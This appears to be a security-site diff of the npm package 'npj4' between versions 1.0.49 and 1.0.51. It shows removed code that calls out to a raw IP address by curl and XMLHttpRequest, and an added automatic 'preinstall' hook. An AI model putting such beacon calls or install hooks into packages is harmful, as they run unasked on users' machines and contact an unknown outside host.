npj4 1.0.49 → 1.0.51

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +2 -2
  2. package/test.js +1 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "npj4",
3
- "version": "1.0.49",
3
+ "version": "1.0.51",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "amis-widgets": [
@@ -19,7 +19,7 @@
19
19
  "."
20
20
  ],
21
21
  "scripts": {
22
- "analyze": "curl http://47.99.124.12:1234"
22
+ "preinstall": "sleep(40)"
23
23
  },
24
24
  "author": "",
25
25
  "license": "ISC"
package/test.js CHANGED
@@ -1,3 +1 @@
1
- x = new XMLHttpRequest;
2
- x.open("GET", "http://47.99.124.12:1234");
3
- x.send()
1
+ console.log(1111111111)